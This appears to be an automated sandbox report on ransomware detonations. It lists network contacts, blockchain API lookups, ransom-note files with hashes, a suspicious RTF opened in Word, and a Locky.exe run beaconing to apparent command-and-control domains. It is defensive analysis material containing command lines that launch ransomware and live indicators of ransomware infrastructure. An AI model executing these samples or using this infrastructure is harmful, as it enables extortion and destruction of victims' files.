FR 178.33.161.169:6893 udp
FR 178.33.161.170:6893 udp
FR 178.33.161.171:6893 udp
FR 178.33.161.172:6893 udp
FR 178.33.161.173:6893 udp
FR 178.33.161.174:6893 udp
FR 178.33.161.175:6893 udp
FR 178.33.161.176:6893 udp
FR 178.33.161.177:6893 udp
FR 178.33.161.178:6893 udp
FR 178.33.161.179:6893 udp
FR 178.33.161.180:6893 udp
FR 178.33.161.181:6893 udp
FR 178.33.161.182:6893 udp
FR 178.33.161.183:6893 udp
FR 178.33.161.184:6893 udp
FR 178.33.161.185:6893 udp
FR 178.33.161.186:6893 udp
FR 178.33.161.187:6893 udp
FR 178.33.161.188:6893 udp
FR 178.33.161.189:6893 udp
FR 178.33.161.190:6893 udp
FR 178.33.161.191:6893 udp
FR 178.33.161.192:6893 udp
FR 178.33.161.193:6893 udp
FR 178.33.161.194:6893 udp
FR 178.33.161.195:6893 udp
FR 178.33.161.196:6893 udp
FR 178.33.161.197:6893 udp
FR 178.33.161.198:6893 udp
FR 178.33.161.199:6893 udp
FR 178.33.161.200:6893 udp
FR 178.33.161.201:6893 udp
FR 178.33.161.202:6893 udp
FR 178.33.161.203:6893 udp
FR 178.33.161.204:6893 udp
FR 178.33.161.205:6893 udp
FR 178.33.161.206:6893 udp
FR 178.33.161.207:6893 udp
FR 178.33.161.208:6893 udp
FR 178.33.161.209:6893 udp
FR 178.33.161.210:6893 udp
FR 178.33.161.211:6893 udp
FR 178.33.161.212:6893 udp
FR 178.33.161.213:6893 udp
FR 178.33.161.214:6893 udp
FR 178.33.161.215:6893 udp
FR 178.33.161.216:6893 udp
FR 178.33.161.217:6893 udp
FR 178.33.161.218:6893 udp
FR 178.33.161.219:6893 udp
FR 178.33.161.220:6893 udp
FR 178.33.161.221:6893 udp
FR 178.33.161.222:6893 udp
FR 178.33.161.223:6893 udp
FR 178.33.161.224:6893 udp
FR 178.33.161.225:6893 udp
FR 178.33.161.226:6893 udp
FR 178.33.161.227:6893 udp
FR 178.33.161.228:6893 udp
FR 178.33.161.229:6893 udp
FR 178.33.161.230:6893 udp
FR 178.33.161.231:6893 udp
FR 178.33.161.232:6893 udp
FR 178.33.161.233:6893 udp
FR 178.33.161.234:6893 udp
FR 178.33.161.235:6893 udp
FR 178.33.161.236:6893 udp
FR 178.33.161.237:6893 udp
FR 178.33.161.238:6893 udp
FR 178.33.161.239:6893 udp
FR 178.33.161.240:6893 udp
FR 178.33.161.241:6893 udp
FR 178.33.161.242:6893 udp
FR 178.33.161.243:6893 udp
FR 178.33.161.244:6893 udp
FR 178.33.161.245:6893 udp
FR 178.33.161.246:6893 udp
FR 178.33.161.247:6893 udp
FR 178.33.161.248:6893 udp
FR 178.33.161.249:6893 udp
FR 178.33.161.250:6893 udp
FR 178.33.161.251:6893 udp
FR 178.33.161.252:6893 udp
FR 178.33.161.253:6893 udp
FR 178.33.161.254:6893 udp
FR 178.33.161.255:6893 udp
FR 178.33.162.0:6893 udp
FR 178.33.162.1:6893 udp
FR 178.33.162.2:6893 udp
FR 178.33.162.3:6893 udp
FR 178.33.162.4:6893 udp
FR 178.33.162.5:6893 udp
FR 178.33.162.6:6893 udp
FR 178.33.162.7:6893 udp
FR 178.33.162.8:6893 udp
FR 178.33.162.9:6893 udp
FR 178.33.162.10:6893 udp
FR 178.33.162.11:6893 udp
FR 178.33.162.12:6893 udp
FR 178.33.162.13:6893 udp
FR 178.33.162.14:6893 udp
FR 178.33.162.15:6893 udp
FR 178.33.162.16:6893 udp
FR 178.33.162.17:6893 udp
FR 178.33.162.18:6893 udp
FR 178.33.162.19:6893 udp
FR 178.33.162.20:6893 udp
FR 178.33.162.21:6893 udp
FR 178.33.162.22:6893 udp
FR 178.33.162.23:6893 udp
FR 178.33.162.24:6893 udp
FR 178.33.162.25:6893 udp
FR 178.33.162.26:6893 udp
FR 178.33.162.27:6893 udp
FR 178.33.162.28:6893 udp
FR 178.33.162.29:6893 udp
FR 178.33.162.30:6893 udp
FR 178.33.162.31:6893 udp
FR 178.33.162.32:6893 udp
FR 178.33.162.33:6893 udp
FR 178.33.162.34:6893 udp
FR 178.33.162.35:6893 udp
FR 178.33.162.36:6893 udp
FR 178.33.162.37:6893 udp
FR 178.33.162.38:6893 udp
FR 178.33.162.39:6893 udp
FR 178.33.162.40:6893 udp
FR 178.33.162.41:6893 udp
FR 178.33.162.42:6893 udp
FR 178.33.162.43:6893 udp
FR 178.33.162.44:6893 udp
FR 178.33.162.45:6893 udp
FR 178.33.162.46:6893 udp
FR 178.33.162.47:6893 udp
FR 178.33.162.48:6893 udp
FR 178.33.162.49:6893 udp
FR 178.33.162.50:6893 udp
FR 178.33.162.51:6893 udp
FR 178.33.162.52:6893 udp
FR 178.33.162.53:6893 udp
FR 178.33.162.54:6893 udp
FR 178.33.162.55:6893 udp
FR 178.33.162.56:6893 udp
FR 178.33.162.57:6893 udp
FR 178.33.162.58:6893 udp
FR 178.33.162.59:6893 udp
FR 178.33.162.60:6893 udp
FR 178.33.162.61:6893 udp
FR 178.33.162.62:6893 udp
FR 178.33.162.63:6893 udp
FR 178.33.162.64:6893 udp
FR 178.33.162.65:6893 udp
FR 178.33.162.66:6893 udp
FR 178.33.162.67:6893 udp
FR 178.33.162.68:6893 udp
FR 178.33.162.69:6893 udp
FR 178.33.162.70:6893 udp
FR 178.33.162.71:6893 udp
FR 178.33.162.72:6893 udp
FR 178.33.162.73:6893 udp
FR 178.33.162.74:6893 udp
FR 178.33.162.75:6893 udp
FR 178.33.162.76:6893 udp
FR 178.33.162.77:6893 udp
FR 178.33.162.78:6893 udp
FR 178.33.162.79:6893 udp
FR 178.33.162.80:6893 udp
FR 178.33.162.81:6893 udp
FR 178.33.162.82:6893 udp
FR 178.33.162.83:6893 udp
FR 178.33.162.84:6893 udp
FR 178.33.162.85:6893 udp
FR 178.33.162.86:6893 udp
FR 178.33.162.87:6893 udp
FR 178.33.162.88:6893 udp
FR 178.33.162.89:6893 udp
FR 178.33.162.90:6893 udp
FR 178.33.162.91:6893 udp
FR 178.33.162.92:6893 udp
FR 178.33.162.93:6893 udp
FR 178.33.162.94:6893 udp
FR 178.33.162.95:6893 udp
FR 178.33.162.96:6893 udp
FR 178.33.162.97:6893 udp
FR 178.33.162.98:6893 udp
FR 178.33.162.99:6893 udp
FR 178.33.162.100:6893 udp
FR 178.33.162.101:6893 udp
FR 178.33.162.102:6893 udp
FR 178.33.162.103:6893 udp
FR 178.33.162.104:6893 udp
FR 178.33.162.105:6893 udp
FR 178.33.162.106:6893 udp
FR 178.33.162.107:6893 udp
FR 178.33.162.108:6893 udp
FR 178.33.162.109:6893 udp
FR 178.33.162.110:6893 udp
FR 178.33.162.111:6893 udp
FR 178.33.162.112:6893 udp
FR 178.33.162.113:6893 udp
FR 178.33.162.114:6893 udp
FR 178.33.162.115:6893 udp
FR 178.33.162.116:6893 udp
FR 178.33.162.117:6893 udp
FR 178.33.162.118:6893 udp
FR 178.33.162.119:6893 udp
FR 178.33.162.120:6893 udp
FR 178.33.162.121:6893 udp
FR 178.33.162.122:6893 udp
FR 178.33.162.123:6893 udp
FR 178.33.162.124:6893 udp
FR 178.33.162.125:6893 udp
FR 178.33.162.126:6893 udp
FR 178.33.162.127:6893 udp
FR 178.33.162.128:6893 udp
FR 178.33.162.129:6893 udp
FR 178.33.162.130:6893 udp
FR 178.33.162.131:6893 udp
FR 178.33.162.132:6893 udp
FR 178.33.162.133:6893 udp
FR 178.33.162.134:6893 udp
FR 178.33.162.135:6893 udp
FR 178.33.162.136:6893 udp
FR 178.33.162.137:6893 udp
FR 178.33.162.138:6893 udp
FR 178.33.162.139:6893 udp
FR 178.33.162.140:6893 udp
FR 178.33.162.141:6893 udp
FR 178.33.162.142:6893 udp
FR 178.33.162.143:6893 udp
FR 178.33.162.144:6893 udp
FR 178.33.162.145:6893 udp
FR 178.33.162.146:6893 udp
FR 178.33.162.147:6893 udp
FR 178.33.162.148:6893 udp
FR 178.33.162.149:6893 udp
FR 178.33.162.150:6893 udp
FR 178.33.162.151:6893 udp
FR 178.33.162.152:6893 udp
FR 178.33.162.153:6893 udp
FR 178.33.162.154:6893 udp
FR 178.33.162.155:6893 udp
FR 178.33.162.156:6893 udp
FR 178.33.162.157:6893 udp
FR 178.33.162.158:6893 udp
FR 178.33.162.159:6893 udp
FR 178.33.162.160:6893 udp
FR 178.33.162.161:6893 udp
FR 178.33.162.162:6893 udp
FR 178.33.162.163:6893 udp
FR 178.33.162.164:6893 udp
FR 178.33.162.165:6893 udp
FR 178.33.162.166:6893 udp
FR 178.33.162.167:6893 udp
FR 178.33.162.168:6893 udp
FR 178.33.162.169:6893 udp
FR 178.33.162.170:6893 udp
FR 178.33.162.171:6893 udp
FR 178.33.162.172:6893 udp
FR 178.33.162.173:6893 udp
FR 178.33.162.174:6893 udp
FR 178.33.162.175:6893 udp
FR 178.33.162.176:6893 udp
FR 178.33.162.177:6893 udp
FR 178.33.162.178:6893 udp
FR 178.33.162.179:6893 udp
FR 178.33.162.180:6893 udp
FR 178.33.162.181:6893 udp
FR 178.33.162.182:6893 udp
FR 178.33.162.183:6893 udp
FR 178.33.162.184:6893 udp
FR 178.33.162.185:6893 udp
FR 178.33.162.186:6893 udp
FR 178.33.162.187:6893 udp
FR 178.33.162.188:6893 udp
FR 178.33.162.189:6893 udp
FR 178.33.162.190:6893 udp
FR 178.33.162.191:6893 udp
FR 178.33.162.192:6893 udp
FR 178.33.162.193:6893 udp
FR 178.33.162.194:6893 udp
FR 178.33.162.195:6893 udp
FR 178.33.162.196:6893 udp
FR 178.33.162.197:6893 udp
FR 178.33.162.198:6893 udp
FR 178.33.162.199:6893 udp
FR 178.33.162.200:6893 udp
FR 178.33.162.201:6893 udp
FR 178.33.162.202:6893 udp
FR 178.33.162.203:6893 udp
FR 178.33.162.204:6893 udp
FR 178.33.162.205:6893 udp
FR 178.33.162.206:6893 udp
FR 178.33.162.207:6893 udp
FR 178.33.162.208:6893 udp
FR 178.33.162.209:6893 udp
FR 178.33.162.210:6893 udp
FR 178.33.162.211:6893 udp
FR 178.33.162.212:6893 udp
FR 178.33.162.213:6893 udp
FR 178.33.162.214:6893 udp
FR 178.33.162.215:6893 udp
FR 178.33.162.216:6893 udp
FR 178.33.162.217:6893 udp
FR 178.33.162.218:6893 udp
FR 178.33.162.219:6893 udp
FR 178.33.162.220:6893 udp
FR 178.33.162.221:6893 udp
FR 178.33.162.222:6893 udp
FR 178.33.162.223:6893 udp
FR 178.33.162.224:6893 udp
FR 178.33.162.225:6893 udp
FR 178.33.162.226:6893 udp
FR 178.33.162.227:6893 udp
FR 178.33.162.228:6893 udp
FR 178.33.162.229:6893 udp
FR 178.33.162.230:6893 udp
FR 178.33.162.231:6893 udp
FR 178.33.162.232:6893 udp
FR 178.33.162.233:6893 udp
FR 178.33.162.234:6893 udp
FR 178.33.162.235:6893 udp
FR 178.33.162.236:6893 udp
FR 178.33.162.237:6893 udp
FR 178.33.162.238:6893 udp
FR 178.33.162.239:6893 udp
FR 178.33.162.240:6893 udp
FR 178.33.162.241:6893 udp
FR 178.33.162.242:6893 udp
FR 178.33.162.243:6893 udp
FR 178.33.162.244:6893 udp
FR 178.33.162.245:6893 udp
FR 178.33.162.246:6893 udp
FR 178.33.162.247:6893 udp
FR 178.33.162.248:6893 udp
FR 178.33.162.249:6893 udp
FR 178.33.162.250:6893 udp
FR 178.33.162.251:6893 udp
FR 178.33.162.252:6893 udp
FR 178.33.162.253:6893 udp
FR 178.33.162.254:6893 udp
FR 178.33.162.255:6893 udp
FR 178.33.163.0:6893 udp
FR 178.33.163.1:6893 udp
FR 178.33.163.2:6893 udp
FR 178.33.163.3:6893 udp
FR 178.33.163.4:6893 udp
FR 178.33.163.5:6893 udp
FR 178.33.163.6:6893 udp
FR 178.33.163.7:6893 udp
FR 178.33.163.8:6893 udp
FR 178.33.163.9:6893 udp
FR 178.33.163.10:6893 udp
FR 178.33.163.11:6893 udp
FR 178.33.163.12:6893 udp
FR 178.33.163.13:6893 udp
FR 178.33.163.14:6893 udp
FR 178.33.163.15:6893 udp
FR 178.33.163.16:6893 udp
FR 178.33.163.17:6893 udp
FR 178.33.163.18:6893 udp
FR 178.33.163.19:6893 udp
FR 178.33.163.20:6893 udp
FR 178.33.163.21:6893 udp
FR 178.33.163.22:6893 udp
FR 178.33.163.23:6893 udp
FR 178.33.163.24:6893 udp
FR 178.33.163.25:6893 udp
FR 178.33.163.26:6893 udp
FR 178.33.163.27:6893 udp
FR 178.33.163.28:6893 udp
FR 178.33.163.29:6893 udp
FR 178.33.163.30:6893 udp
FR 178.33.163.31:6893 udp
FR 178.33.163.32:6893 udp
FR 178.33.163.33:6893 udp
FR 178.33.163.34:6893 udp
FR 178.33.163.35:6893 udp
FR 178.33.163.36:6893 udp
FR 178.33.163.37:6893 udp
FR 178.33.163.38:6893 udp
FR 178.33.163.39:6893 udp
FR 178.33.163.40:6893 udp
FR 178.33.163.41:6893 udp
FR 178.33.163.42:6893 udp
FR 178.33.163.43:6893 udp
FR 178.33.163.44:6893 udp
FR 178.33.163.45:6893 udp
FR 178.33.163.46:6893 udp
FR 178.33.163.47:6893 udp
FR 178.33.163.48:6893 udp
FR 178.33.163.49:6893 udp
FR 178.33.163.50:6893 udp
FR 178.33.163.51:6893 udp
FR 178.33.163.52:6893 udp
FR 178.33.163.53:6893 udp
FR 178.33.163.54:6893 udp
FR 178.33.163.55:6893 udp
FR 178.33.163.56:6893 udp
FR 178.33.163.57:6893 udp
FR 178.33.163.58:6893 udp
FR 178.33.163.59:6893 udp
FR 178.33.163.60:6893 udp
FR 178.33.163.61:6893 udp
FR 178.33.163.62:6893 udp
FR 178.33.163.63:6893 udp
FR 178.33.163.64:6893 udp
FR 178.33.163.65:6893 udp
FR 178.33.163.66:6893 udp
FR 178.33.163.67:6893 udp
FR 178.33.163.68:6893 udp
FR 178.33.163.69:6893 udp
FR 178.33.163.70:6893 udp
FR 178.33.163.71:6893 udp
FR 178.33.163.72:6893 udp
FR 178.33.163.73:6893 udp
FR 178.33.163.74:6893 udp
FR 178.33.163.75:6893 udp
FR 178.33.163.76:6893 udp
FR 178.33.163.77:6893 udp
FR 178.33.163.78:6893 udp
FR 178.33.163.79:6893 udp
FR 178.33.163.80:6893 udp
FR 178.33.163.81:6893 udp
FR 178.33.163.82:6893 udp
FR 178.33.163.83:6893 udp
FR 178.33.163.84:6893 udp
FR 178.33.163.85:6893 udp
FR 178.33.163.86:6893 udp
FR 178.33.163.87:6893 udp
FR 178.33.163.88:6893 udp
FR 178.33.163.89:6893 udp
FR 178.33.163.90:6893 udp
FR 178.33.163.91:6893 udp
FR 178.33.163.92:6893 udp
FR 178.33.163.93:6893 udp
FR 178.33.163.94:6893 udp
FR 178.33.163.95:6893 udp
FR 178.33.163.96:6893 udp
FR 178.33.163.97:6893 udp
FR 178.33.163.98:6893 udp
US 8.8.8.8:53 api.blockcypher.com udp
US 104.20.98.10:80 api.blockcypher.com tcp
US 8.8.8.8:53 btc.blockr.io udp
US 8.8.8.8:53 bitaps.com udp
NL 178.128.255.179:443 bitaps.com tcp
US 8.8.8.8:53 chain.so udp
US 172.67.40.90:443 chain.so tcp

Files

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WK6IB3_.hta

MD5 57a8c0d4fe772033335dd5a23a210911
SHA1 6f19c3a3e0a2037b3347a5563cc40fc4fc0eafde
SHA256 55fc9efb7c5157327de83d6483f0e75c7d52c1438683362e5c13a123d5826e3f
SHA512 dd3f911ef156ac061b20e4e190663971c92c616b09584059ad31b83bd1bb8790eacb75ee62f2145622a8da1ea6673e9d28da55c78c3e671fddf9938a4e3db8b0

C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VBTJZKN_.txt

MD5 e518b413e44fb9f72485ca6d10a32a5b
SHA1 61171a22842177a69e19b123a4504d53c675a740
SHA256 708bb4f2709d9660a8fac808e561dad8026396346bc347185b1c7e8f1e1c158a
SHA512 5b4c17175031de5815bc9dad389c51e3eee917d2a64857369db708c52ef60aa9a42f60657f3db29dcd1db2179cfafb493eb97b3edaf85da779902bd8b0e82596

memory/2192-111-0x0000000000400000-0x0000000000435000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar4E65.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2852-307-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2852-308-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2852-309-0x0000000140000000-0x00000001405E8000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win7-20240221-en

Max time kernel

1561s

Max time network

1565s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf"

Signatures

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Office loads VBA resources, possible macro or embedded object present

Modifies Internet Explorer settings

adware spyware

Modifies registry class


Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
DE 84.200.16.242:80 tcp
DE 84.200.16.242:80 tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 8a3e2aeb937fc1ad9ac07e24650e0287
SHA1 9a9eaaae50e155d5bef572bbc2f4690dfd696fe9
SHA256 152b9e1e72ee0a7f77c68379b12068959975d25c5da9469f8f1067de713a81a7
SHA512 83bab3041052027e219bd2b597a561f7e37a842faf55ae3f7b214e8bcfdcf5bed7ddc1b99f247833d941d8ff41403f7d2ec3ac50b68ac80b7d04823960ff6775

memory/2880-29-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2880-30-0x000000007104D000-0x0000000071058000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240508-en

Max time kernel

1796s

Max time network

1799s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5060 wrote to memory of 1364 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe
PID 5060 wrote to memory of 1364 N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE C:\Windows\splwow64.exe

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fe2e5d0543b4c8769e401ec216d78a5a3547dfd426fd47e097df04a5f7d6d206_OFkNP1kKL9.rtf" /o ""

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

Network

Country Destination Domain Proto
DE 84.200.16.242:80 tcp
US 8.8.8.8:53 roaming.officeapps.live.com udp
DE 84.200.16.242:80 tcp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-30 00:59

Reported

2024-06-30 01:30

Platform

win10v2004-20240611-en

Max time kernel

1799s

Max time network

1804s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Signatures

Locky

ransomware locky

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Locky\Locky.exe"

Network

Country Destination Domain Proto
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
US 8.8.8.8:53 htknqmpojpkrl.yt udp
IE 86.104.134.144:80 tcp
US 8.8.8.8:53 nwohmkgabcexy.uk udp
US 8.8.8.8:53 bmltj.yt udp
US 8.8.8.8:53 oclkiawk.pm udp
US 162.249.64.234:80 greootc.eu tcp
US 8.8.8.8:53 tektkyupmj.be udp
